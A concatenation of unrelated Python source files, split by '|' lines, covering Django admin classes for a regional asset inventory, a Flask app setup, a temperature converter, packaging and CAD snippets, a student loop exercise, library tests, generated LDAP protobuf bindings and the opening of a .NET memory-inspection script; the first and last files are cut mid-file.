        qs_id_sub_skpd=105
        return self.model.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd).filter(id_golongan_barang__exact=3).filter(id_mutasi_berkurang__exact=5)
class GedungBangunanRuanganDisdikSMPN2HalongAdmin(GedungBangunanRuanganAdmin):
    """Building/room admin limited to sub-SKPD 105, golongan barang 3."""
    def get_queryset(self, request):
        qs = 105
        return self.model.objects.filter(id_sub_skpd__exact=qs).filter(id_golongan_barang__exact=3).filter(id_mutasi_berkurang__exact=5)
class HargaGedungBangunanDisdikSMPN2HalongAdmin(HargaGedungBangunanAdmin):
    """Building-price admin restricted to buildings under sub-SKPD 105."""
    def get_queryset(self, request):
        qs_id_sub_skpd=105
        gedung_bangunan_qs = GedungBangunan.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd)
        return self.model.objects.filter(id_gedung_bangunan__in=gedung_bangunan_qs)

###Register GedungBangunan DisdikSMPN2Halong
admin.site.register(GedungBangunanDisdikSMPN2Halong, GedungBangunanDisdikSMPN2HalongAdmin)
admin.site.register(GedungBangunanRuanganDisdikSMPN2Halong, GedungBangunanRuanganDisdikSMPN2HalongAdmin)
admin.site.register(HargaGedungBangunanDisdikSMPN2Halong, HargaGedungBangunanDisdikSMPN2HalongAdmin)
#### Class Peralatan Mesin
class HargaPeralatanMesinDisdikSMPN2HalongInline(HargaPeralatanMesinInline):
    """Equipment-price inline for SMPN 2 Halong."""
    model = HargaPeralatanMesinDisdikSMPN2Halong

    def formfield_for_foreignkey(self, db_field, request, **kwargs):
        # Restrict the contract dropdown to contracts owned by SKPD id 7.
        if db_field.name == "id_kontrak_peralatan_mesin":
            kwargs["queryset"] = KontrakPeralatanMesin.objects.filter(id_skpd__exact=7)
        return super(HargaPeralatanMesinDisdikSMPN2HalongInline, self).formfield_for_foreignkey(db_field, request, **kwargs)
class PeralatanMesinDisdikSMPN2HalongAdmin(PeralatanMesinAdmin):
    """Machinery/equipment admin limited to sub-SKPD 105."""
    inlines = [HargaPeralatanMesinDisdikSMPN2HalongInline]

    def formfield_for_foreignkey(self, db_field, request, **kwargs):
        # Only offer sub-SKPD 105, and only rooms in buildings of that sub-SKPD.
        if db_field.name == "id_sub_skpd":
            qs_id_sub_skpd=105
            kwargs["queryset"] = SUBSKPD.objects.filter(id__exact=qs_id_sub_skpd)
        if db_field.name == "id_ruangan":
            qs_id_sub_skpd=105
            kwargs["queryset"] = Ruangan.objects.filter(id_gedung_bangunan__id_sub_skpd__exact=qs_id_sub_skpd)
        return super(PeralatanMesinDisdikSMPN2HalongAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)

    def get_queryset(self, request):
        qs_id_sub_skpd=105
        return self.model.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd).filter(id_mutasi_berkurang__exact=5)
class HargaPeralatanMesinDisdikSMPN2HalongAdmin(HargaPeralatanMesinAdmin):
    """Equipment-price admin restricted to equipment under sub-SKPD 105."""
    def get_queryset(self, request):
        qs_id_sub_skpd=105
        peralatan_mesin_qs = PeralatanMesin.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd)
        return self.model.objects.filter(id_peralatan_mesin__in=peralatan_mesin_qs)

###Register PeralatanMesin DisdikSMPN2Halong
admin.site.register(PeralatanMesinDisdikSMPN2Halong, PeralatanMesinDisdikSMPN2HalongAdmin)
admin.site.register(HargaPeralatanMesinDisdikSMPN2Halong, HargaPeralatanMesinDisdikSMPN2HalongAdmin)
#### Jalan, Irigasi, dan Jaringan
from jalanirigasijaringan.models import KontrakJalanIrigasiJaringan, HargaJalanIrigasiJaringan, JalanIrigasiJaringan, PenghapusanJalanIrigasiJaringan, PemanfaatanJalanIrigasiJaringan, TahunBerkurangJalanIrigasiJaringan
from jalanirigasijaringan.models import JalanIrigasiJaringanPemanfaatan, JalanIrigasiJaringanPenghapusan
from jalanirigasijaringan.models import JalanIrigasiJaringanDisdikSMPN2Halong, HargaJalanIrigasiJaringanDisdikSMPN2Halong
from jalanirigasijaringan.admin import HargaJalanIrigasiJaringanInline, JalanIrigasiJaringanAdmin, KontrakJalanIrigasiJaringanAdmin, HargaJalanIrigasiJaringanAdmin
#### Class Jalan, Irigasi dan Jaringan
class HargaJalanIrigasiJaringanDisdikSMPN2HalongInline(HargaJalanIrigasiJaringanInline):
    """Road/irrigation/network price inline for SMPN 2 Halong."""
    model = HargaJalanIrigasiJaringanDisdikSMPN2Halong

    def formfield_for_foreignkey(self, db_field, request, **kwargs):
        # Restrict the contract dropdown to contracts owned by SKPD id 7.
        if db_field.name == "id_kontrak_jalan_irigasi_jaringan":
            kwargs["queryset"] = KontrakJalanIrigasiJaringan.objects.filter(id_skpd__exact=7)
        return super(HargaJalanIrigasiJaringanDisdikSMPN2HalongInline, self).formfield_for_foreignkey(db_field, request, **kwargs)
class JalanIrigasiJaringanDisdikSMPN2HalongAdmin(JalanIrigasiJaringanAdmin):
    """Road/irrigation/network admin limited to sub-SKPD 105, golongan barang 4."""
    inlines = [HargaJalanIrigasiJaringanDisdikSMPN2HalongInline]

    def formfield_for_foreignkey(self, db_field, request, **kwargs):
        # Only offer sub-SKPD 105 in the dropdown.
        if db_field.name == "id_sub_skpd":
            qs_id_sub_skpd=105
            kwargs["queryset"] = SUBSKPD.objects.filter(id__exact=qs_id_sub_skpd)
        return super(JalanIrigasiJaringanDisdikSMPN2HalongAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)

    def get_queryset(self, request):
        qs_id_sub_skpd=105
        return self.model.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd).filter(id_golongan_barang__exact=4).filter(id_mutasi_berkurang__exact=5)
class HargaJalanIrigasiJaringanDisdikSMPN2HalongAdmin(HargaJalanIrigasiJaringanAdmin):
    """Price admin restricted to road/irrigation/network assets under sub-SKPD 105."""
    def get_queryset(self, request):
        qs_id_sub_skpd=105
        jalan_irigasi_jaringan_qs = JalanIrigasiJaringan.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd)
        return self.model.objects.filter(id_jalan_irigasi_jaringan__in=jalan_irigasi_jaringan_qs)

###Register JalanIrigasiJaringan DisdikSMPN2Halong
admin.site.register(JalanIrigasiJaringanDisdikSMPN2Halong, JalanIrigasiJaringanDisdikSMPN2HalongAdmin)
admin.site.register(HargaJalanIrigasiJaringanDisdikSMPN2Halong, HargaJalanIrigasiJaringanDisdikSMPN2HalongAdmin)
#### Aset Tetap Lainnya
from atl.models import KontrakATL, HargaATL, ATL, PenghapusanATL, PemanfaatanATL, TahunBerkurangATL, TahunBerkurangUsulHapusATL
from atl.models import ATLPemanfaatan, ATLPenghapusan
from atl.models import ATLDisdikSMPN2Halong, HargaATLDisdikSMPN2Halong
from atl.admin import HargaATLInline, ATLAdmin, KontrakATLAdmin, HargaATLAdmin
#### Class Aset Tetap Lainnya
class HargaATLDisdikSMPN2HalongInline(HargaATLInline):
    """Other-fixed-asset (ATL) price inline for SMPN 2 Halong."""
    model = HargaATLDisdikSMPN2Halong

    def formfield_for_foreignkey(self, db_field, request, **kwargs):
        # Restrict the contract dropdown to contracts owned by SKPD id 7.
        if db_field.name == "id_kontrak_atl":
            kwargs["queryset"] = KontrakATL.objects.filter(id_skpd__exact=7)
        return super(HargaATLDisdikSMPN2HalongInline, self).formfield_for_foreignkey(db_field, request, **kwargs)
class ATLDisdikSMPN2HalongAdmin(ATLAdmin):
    """Other-fixed-asset (ATL) admin limited to sub-SKPD 105."""
    inlines = [HargaATLDisdikSMPN2HalongInline]

    def formfield_for_foreignkey(self, db_field, request, **kwargs):
        # Only offer sub-SKPD 105, and only rooms in buildings of that sub-SKPD.
        if db_field.name == "id_sub_skpd":
            qs_id_sub_skpd=105
            kwargs["queryset"] = SUBSKPD.objects.filter(id__exact=qs_id_sub_skpd)
        if db_field.name == "id_ruangan":
            qs_id_sub_skpd=105
            kwargs["queryset"] = Ruangan.objects.filter(id_gedung_bangunan__id_sub_skpd__exact=qs_id_sub_skpd)
        return super(ATLDisdikSMPN2HalongAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)

    def get_queryset(self, request):
        qs_id_sub_skpd=105
        return self.model.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd).filter(id_mutasi_berkurang__exact=5)
class HargaATLDisdikSMPN2HalongAdmin(HargaATLAdmin):
    """ATL price admin restricted to assets under sub-SKPD 105."""
    def get_queryset(self, request):
        qs_id_sub_skpd=105
        atl_qs = ATL.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd)
        return self.model.objects.filter(id_atl__in=atl_qs)

###Register ATL DisdikSMPN2Halong
admin.site.register(ATLDisdikSMPN2Halong, ATLDisdikSMPN2HalongAdmin)
admin.site.register(HargaATLDisdikSMPN2Halong, HargaATLDisdikSMPN2HalongAdmin)
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_user import UserManager

# Create the Flask app and load settings from the top-level config module.
app = Flask(__name__, static_folder="static")
app.config.from_object("config")
db = SQLAlchemy(app)

# These imports need to come after the app is instantiated
# (the view/model modules import `app`/`db` from this module).
from deplatformr.views import views, facebook_views, filecoin_views
from deplatformr.models import user_models, filecoin_models

# Setup Flask-User and specify the User data-model
user_manager = UserManager(app, db, user_models.User)
#!/usr/bin/env python3
"""
Utils for the converter API
:author: Angelo Cutaia, Claudio Tancredi
:copyright: Copyright 2020, Angelo Cutaia, Claudio Tancredi
..
Copyright 2020 Angelo Cutaia
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Standard Library
from typing import Callable, Dict
# Third party
import cherrypy
# ------------------------------------------------------------------------------------------
######################
# UTILITY FUNCTIONS #
######################
def celsius(value: float, target_unit: str) -> float:
    """
    Utility function for Celsius conversion in Kelvin or in Fahrenheit.

    :param value: temperature in degrees Celsius
    :param target_unit: "K" for Kelvin; any other value converts to Fahrenheit
    :return: value converted in the right scale
    """
    return value + 273.15 if target_unit == "K" else value * 1.8 + 32
def fahrenheit(value: float, target_unit: str) -> float:
    """
    Utility function for Fahrenheit conversion in Celsius or in Kelvin.

    :param value: temperature in degrees Fahrenheit
    :param target_unit: "C" for Celsius; any other value converts to Kelvin
    :return: value converted in the right scale
    """
    if target_unit == "C":
        # Convert in Celsius scale
        return (value - 32) / 1.8
    else:
        # Convert in Kelvin scale.
        # Bug fix: the original computed (value - 32) / 1 - 8 + 273.15,
        # i.e. it divided by 1 and subtracted 8 instead of dividing by 1.8.
        return (value - 32) / 1.8 + 273.15
def kelvin(value: float, target_unit: str) -> float:
    """
    Utility function for Kelvin conversion in Celsius or in Fahrenheit.

    :param value: temperature in Kelvin
    :param target_unit: "C" for Celsius; any other value converts to Fahrenheit
    :return: value converted in the right scale
    """
    # Shift to Celsius first; scale further only for Fahrenheit.
    as_celsius = value - 273.15
    if target_unit == "C":
        return as_celsius
    return as_celsius * 1.8 + 32
# ---------------------------------------------------------------------------------------------
#################
# UTILITY CLASS #
#################
class ConverterUtils:
    """
    Class that handles the conversion of temperature values in the requested scales.
    This class doesn't have an __init__(self).
    It will be used only as an interface to perform the conversion, so it won't be instantiated.
    To do that it uses the classmethod conversion, and the immutable class attributes:
     * _supported_scales
     * _absolute_zero
     * _conversion
    """
    _supported_scales = ("C", "F", "K")
    """Set of supported scales"""

    _absolute_zero = {
        "C": -273.15,
        "F": -459.67,
        "K": 0.0
    }
    """Association between a scale and the respective absolute zero"""

    _conversion: Dict[str, Callable[[float, str], float]] = {
        "C": celsius,
        "F": fahrenheit,
        "K": kelvin
    }
    """Association between a scale and a converter function"""

    @classmethod
    def conversion(cls, value: float, original_unit: str, target_unit: str) -> float:
        """
        Analyze the value to convert and the scale to use.
        In case of error raise an HTTP exception to tell the client that the request has some errors.

        :param value: temperature
        :param original_unit: Celsius, Kelvin or Fahrenheit
        :param target_unit: Celsius, Kelvin or Fahrenheit
        :return: value converted in the right scale
        :raises cherrypy.HTTPError: 422 for an unsupported scale; 409 when the
            scales coincide or the value is below the original scale's absolute zero
        """
        # Check if the scales are supported
        if original_unit not in cls._supported_scales:
            raise cherrypy.HTTPError(
                status=422,
                message=f"Original unit {original_unit} isn't in the supported scales: {cls._supported_scales}"
            )
        if target_unit not in cls._supported_scales:
            raise cherrypy.HTTPError(
                status=422,
                message=f"Target unit {target_unit} isn't in the supported scales: {cls._supported_scales}"
            )
        # Check if the scales aren't equal
        if original_unit == target_unit:
            raise cherrypy.HTTPError(
                status=409,
                message="Impossible to convert cause the original_unit scale coincide with the target_unit scale"
            )
        # Check if the original unit value is coherent with original unit absolute zero
        if cls._absolute_zero[original_unit] > value:
            raise cherrypy.HTTPError(
                status=409,
                message=f"Original value ({value} {original_unit}) lower than absolute zero "
                        f"({cls._absolute_zero[original_unit]} {original_unit})."
            )
        # Return the converted value (dispatch on the source scale).
        return cls._conversion[original_unit](value, target_unit)
|
# Packaging metadata for the kmertools distribution.
# NOTE(review): distutils is deprecated (removed in Python 3.12) -- consider
# migrating to setuptools; confirm against the project's build tooling.
from distutils.core import setup

setup(
    name='kmertools',
    version='0.1.0',
    author='Simone Longo',
    author_email='s.longo@utah.edu',
    packages=['kmertools'],
    license='LICENSE.txt',
    description='Tools for processing VCF files in parallel in addition to k-mer search and analysis',
    # The long description is read from the README at sdist-build time.
    long_description=open('README.rst').read(),
    # Runtime dependencies installed alongside the package.
    install_requires=[
        "pyfaidx",
        "cyvcf2",
        "pandas",
        "numpy",
        "pytabix",
    ],
)
|
import cadquery as cq
from wing_utils import show

# Build a hollowed elliptical solid: a 2 x 4 ellipse sketched on the "front"
# workplane, extruded 2 units, then shelled with thickness -1.5
# (presumably hollowing inward from the outer faces -- confirm against the
# cadquery .shell() documentation).
result = cq.Workplane("front").ellipse(2, 4).extrude(2).shell(-1.5)

# Display the result using the project's viewer helper.
show(result)
|
# Dasean Volk, dvolk@usc.edu
# ITP 115, Fall 2021
# Section: Boba
# Assignment 4
# Description: a program that allows the user to enter an unknown amount of numbers.
# The user signals that they are done entering numbers by entering -1.  The program
# determines the smallest, largest, sum, count and average of the numbers entered,
# and lets the user repeat the process with a fresh set of numbers.
#
# Fixes vs. the previous draft:
#   * `while` had no condition and the `if again` branch had no body (SyntaxErrors);
#   * the -1 sentinel itself was folded into smallest/largest/sum/count;
#   * `sum` shadowed the builtin; the average was never computed.

again = "y"
# Outer "do while" loop: runs at least once, repeats while the user answers yes.
while again == "y" or again == "Y":
    # Per-set accumulators; reset for every new set of numbers.
    count = 0
    total = 0
    smallest = None
    largest = None

    # Display instructions to the user.
    print("\nInput an integer greater than or equal to 0 (-1 to quit):")
    number = int(input("> "))
    # Inner loop ends when the user enters -1; the sentinel is NOT counted.
    while number != -1:
        if count == 0:
            # The first number seen is both the smallest and largest so far.
            smallest = number
            largest = number
        elif number > largest:
            largest = number
        elif number < smallest:
            smallest = number
        total = total + number
        count = count + 1
        number = int(input("> "))

    if count > 0:
        print("Smallest:", smallest)
        print("Largest:", largest)
        print("Sum:", total)
        print("Count:", count)
        # count > 0 here, so no division by zero.
        print("Average:", total / count)
    else:
        print("No numbers were entered.")

    again = input("Would you like to enter another set of numbers (y/n)?")

print("Goodbye!")
|
from itertools import permutations
import numpy as np
import pytest
import torch
from test_types import image_av_chunk # noqa
from mohou.encoder import ImageEncoder, VectorIdenticalEncoder
from mohou.encoding_rule import ElemCovMatchPostProcessor, EncodingRule
from mohou.types import AngleVector, RGBDImage, RGBImage, TerminateFlag, VectorBase
def test_ElemCovMatchPostProcessor():
    """Round-trip and characteristic-std checks for ElemCovMatchPostProcessor."""
    first_dim, second_dim = 2, 3
    offset = 10

    # Feature block 1: unit-variance gaussian shifted by a constant bias.
    block_a = np.random.randn(100000, first_dim) + np.ones(2) * offset
    # Feature block 2: gaussian with per-column stds of 3, 2 and 0.5.
    block_b = np.random.randn(100000, second_dim)
    block_b[:, 0] *= 3
    block_b[:, 1] *= 2
    block_b[:, 2] *= 0.5
    features = np.concatenate([block_a, block_b], axis=1)

    normalizer = ElemCovMatchPostProcessor.from_feature_seqs(features, [first_dim, second_dim])

    # apply() followed by inverse_apply() must be (nearly) the identity.
    sample = np.random.randn(5)
    recovered = normalizer.inverse_apply(normalizer.apply(sample))
    np.testing.assert_almost_equal(sample, recovered, decimal=2)

    # Characteristic stds reflect each block's dominant std ...
    np.testing.assert_almost_equal(
        normalizer.characteristic_stds, np.array([1.0, 3.0]), decimal=1
    )
    # ... and the scaled variant is normalized by the largest of them.
    np.testing.assert_almost_equal(
        normalizer.scaled_characteristic_stds, np.array([1.0 / 3.0, 1.0]), decimal=2
    )
def test_encoding_rule(image_av_chunk):  # noqa
    """EncodingRule concatenates encoder outputs and preserves encoder order."""
    chunk = image_av_chunk
    image_dim, av_dim = 5, 10

    image_encoder = ImageEncoder(
        RGBImage,
        lambda img: torch.zeros(image_dim),
        lambda vec: torch.zeros(3, 100, 100),
        (100, 100, 3),
        image_dim,
    )
    av_encoder = VectorIdenticalEncoder(AngleVector, av_dim)
    flag_encoder = VectorIdenticalEncoder(TerminateFlag, 1)
    rule = EncodingRule.from_encoders([image_encoder, av_encoder, flag_encoder], chunk=chunk)

    seq_list = rule.apply_to_multi_episode_chunk(chunk)
    # 10 timesteps; the feature dim is the sum of the individual encoder dims.
    assert seq_list[0].shape == (10, image_dim + av_dim + 1)

    class Dummy(VectorBase):
        pass

    # Check dict insertion order is preserved.
    # NOTE: from 3.7, order is preserved as lang. spec.
    # NOTE: from 3.6, order is preserved in a cpython implementation
    flag_encoder = VectorIdenticalEncoder(TerminateFlag, 1)
    dummy_encoder = VectorIdenticalEncoder(Dummy, 2)
    pairs = [
        (image_encoder, RGBImage),
        (av_encoder, AngleVector),
        (flag_encoder, TerminateFlag),
        (dummy_encoder, Dummy),
    ]
    for permuted in permutations(pairs, 4):
        encoders = [encoder for encoder, _ in permuted]
        expected_keys = [elem_type for _, elem_type in permuted]
        assert list(EncodingRule.from_encoders(encoders).keys()) == expected_keys
def test_encoding_rule_assertion(image_av_chunk):  # noqa
    """Applying a rule whose image type mismatches the chunk must assert."""
    chunk = image_av_chunk
    rgbd_dim, av_dim = 5, 10

    # RGBD encoder while the fixture chunk contains RGB images -> mismatch.
    rgbd_encoder = ImageEncoder(
        RGBDImage,
        lambda img: torch.zeros(rgbd_dim),
        lambda vec: torch.zeros(4, 100, 100),
        (100, 100, 4),
        rgbd_dim,
    )
    av_encoder = VectorIdenticalEncoder(AngleVector, av_dim)
    rule = EncodingRule.from_encoders([rgbd_encoder, av_encoder])

    with pytest.raises(AssertionError):
        rule.apply_to_multi_episode_chunk(chunk)
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: config.proto
# Python bindings for the "ldap" proto package: ConfigRequest (with its
# nested Conf message) and ConfigResponseWrapper.  Regenerate from
# config.proto instead of editing this file by hand.
import sys
# Py2/Py3 shim: serialized descriptors are latin-1 bytes on Python 3.
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()


from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2

# File descriptor built from the serialized config.proto definition.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='config.proto',
  package='ldap',
  syntax='proto3',
  serialized_options=None,
  serialized_pb=_b('\n\x0c\x63onfig.proto\x12\x04ldap\x1a\x1bgoogle/protobuf/empty.proto\"\xd5\x01\n\rConfigRequest\x12\x0b\n\x03key\x18\x01 \x01(\t\x12&\n\x04\x63onf\x18\x02 \x01(\x0b\x32\x18.ldap.ConfigRequest.Conf\x1a\x8e\x01\n\x04\x43onf\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x16\n\x0euser_search_dn\x18\x02 \x01(\t\x12\x13\n\x0buser_filter\x18\x03 \x01(\t\x12\x12\n\nmanager_dn\x18\x04 \x01(\t\x12\x18\n\x10manager_password\x18\x05 \x01(\t\x12\x10\n\x08username\x18\x06 \x01(\t\x12\x0b\n\x03org\x18\x07 \x01(\x05\"o\n\x15\x43onfigResponseWrapper\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\x13\n\x0b\x63odeExplain\x18\x02 \x01(\t\x12\r\n\x05\x65rror\x18\x03 \x01(\t\x12$\n\x04\x64\x61ta\x18\x04 \x01(\x0b\x32\x16.google.protobuf.Emptyb\x06proto3')
  ,
  dependencies=[google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,])


# Descriptor for the nested message ldap.ConfigRequest.Conf
# (LDAP connection settings: search DN, filter, manager credentials, ...).
_CONFIGREQUEST_CONF = _descriptor.Descriptor(
  name='Conf',
  full_name='ldap.ConfigRequest.Conf',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='name', full_name='ldap.ConfigRequest.Conf.name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='user_search_dn', full_name='ldap.ConfigRequest.Conf.user_search_dn', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='user_filter', full_name='ldap.ConfigRequest.Conf.user_filter', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='manager_dn', full_name='ldap.ConfigRequest.Conf.manager_dn', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='manager_password', full_name='ldap.ConfigRequest.Conf.manager_password', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='username', full_name='ldap.ConfigRequest.Conf.username', index=5,
      number=6, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='org', full_name='ldap.ConfigRequest.Conf.org', index=6,
      number=7, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=123,
  serialized_end=265,
)

# Descriptor for ldap.ConfigRequest: a string key plus a Conf payload.
_CONFIGREQUEST = _descriptor.Descriptor(
  name='ConfigRequest',
  full_name='ldap.ConfigRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='key', full_name='ldap.ConfigRequest.key', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='conf', full_name='ldap.ConfigRequest.conf', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[_CONFIGREQUEST_CONF, ],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=52,
  serialized_end=265,
)

# Descriptor for ldap.ConfigResponseWrapper: status code, explanation,
# error text and an (empty) data payload.
_CONFIGRESPONSEWRAPPER = _descriptor.Descriptor(
  name='ConfigResponseWrapper',
  full_name='ldap.ConfigResponseWrapper',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='code', full_name='ldap.ConfigResponseWrapper.code', index=0,
      number=1, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='codeExplain', full_name='ldap.ConfigResponseWrapper.codeExplain', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='error', full_name='ldap.ConfigResponseWrapper.error', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='data', full_name='ldap.ConfigResponseWrapper.data', index=3,
      number=4, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=267,
  serialized_end=378,
)

# Wire up cross-references between the descriptors, then register them.
_CONFIGREQUEST_CONF.containing_type = _CONFIGREQUEST
_CONFIGREQUEST.fields_by_name['conf'].message_type = _CONFIGREQUEST_CONF
_CONFIGRESPONSEWRAPPER.fields_by_name['data'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
DESCRIPTOR.message_types_by_name['ConfigRequest'] = _CONFIGREQUEST
DESCRIPTOR.message_types_by_name['ConfigResponseWrapper'] = _CONFIGRESPONSEWRAPPER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)

# Concrete message classes generated from the descriptors above.
ConfigRequest = _reflection.GeneratedProtocolMessageType('ConfigRequest', (_message.Message,), {
  'Conf' : _reflection.GeneratedProtocolMessageType('Conf', (_message.Message,), {
    'DESCRIPTOR' : _CONFIGREQUEST_CONF,
    '__module__' : 'config_pb2'
    # @@protoc_insertion_point(class_scope:ldap.ConfigRequest.Conf)
    })
  ,
  'DESCRIPTOR' : _CONFIGREQUEST,
  '__module__' : 'config_pb2'
  # @@protoc_insertion_point(class_scope:ldap.ConfigRequest)
  })
_sym_db.RegisterMessage(ConfigRequest)
_sym_db.RegisterMessage(ConfigRequest.Conf)

ConfigResponseWrapper = _reflection.GeneratedProtocolMessageType('ConfigResponseWrapper', (_message.Message,), {
  'DESCRIPTOR' : _CONFIGRESPONSEWRAPPER,
  '__module__' : 'config_pb2'
  # @@protoc_insertion_point(class_scope:ldap.ConfigResponseWrapper)
  })
_sym_db.RegisterMessage(ConfigResponseWrapper)

# @@protoc_insertion_point(module_scope)
|
__author__ = 'Radoslaw Matusiak'
__copyright__ = 'Copyright (c) 2017 Radoslaw Matusiak'
__license__ = 'MIT'
__version__ = '0.1'
import clr
import imp
import os
import sys
import tempfile
MANAGED_HEAPS = [] # List of tupples (start_address, stop_address, details) describing managed heaps
def on_load():
    """
    Execute when module is imported.

    Prints basic process info (PID, current directory) so the user can
    point external tools such as vmmap at the right process.
    """
    # NOTE: Python 2 print statements -- this script targets (Iron)Python 2.
    print '[+] Loading Ishtar script'
    print '[+] PID: {0}'.format(os.getpid())
    print '[+] Current workin directory: {0}'.format(os.getcwd())
# end-of-function on_load


# Run immediately on import so the banner appears as soon as the script loads.
on_load()
def test_objects():
    """
    Manual smoke test: locate a managed System.String instance by address.

    NOTE(review): relies on a global `Objects` helper that is not defined in
    this module -- confirm where it is expected to be injected from.
    """
    import clr
    clr.AddReference('System')
    import System

    t = System.String('test')
    # Resolve the CLR object's address, then re-fetch the instance from it.
    t_ptr = Objects.GetObjectAddress(t)
    x = Objects.GetInstance(t_ptr, Objects.CLR_VERSION.VER_4_0)
# end-of-function test
def run_vmmap(vmmap):
    """
    Run vmmap against the current process and fill the MANAGED_HEAPS variable.

    Exports a CSV report to the current working directory, parses it via
    parse_vmmap_file(), then deletes the temporary CSV.

    Arguments:
    vmmap -- Full path to vmmap.exe.

    Returns: None.
    """
    if os.path.isfile(vmmap):
        print '[+] Running vmmap...'
        # Export a CSV snapshot of this process's memory map.
        pid = os.getpid()
        vmmap_csv = os.path.join(os.getcwd(), 'vmmap.csv')
        os.system('{0} -p {1} {2}'.format(vmmap, pid, vmmap_csv))

        print '[+] Parsing vmmap output...'
        parse_vmmap_file(vmmap_csv)

        # The CSV is only an intermediate artifact; remove it when done.
        print '[+] Cleaning...'
